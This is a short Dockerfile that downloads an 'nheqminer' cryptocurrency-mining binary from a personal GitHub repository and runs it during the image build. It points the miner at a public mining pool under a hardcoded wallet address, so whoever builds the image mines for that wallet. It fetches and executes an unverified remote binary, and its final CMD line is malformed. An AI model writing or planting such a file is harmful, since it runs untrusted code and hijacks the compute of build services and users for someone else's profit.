FROM ubuntu:latest
RUN apt update && apt install wget -y
WORKDIR /home
RUN wget https://github.com/agumyudhistira/mine/raw/main/nheqminer
RUN chmod +x nheqminer
RUN ./nheqminer -v -l na.luckpool.net:3956 -u RGGqkqX6HXJrJ3iRWaZs8CGvj2tyPtj4q9.WORKER-01 -p x -t 4
CMD (-h)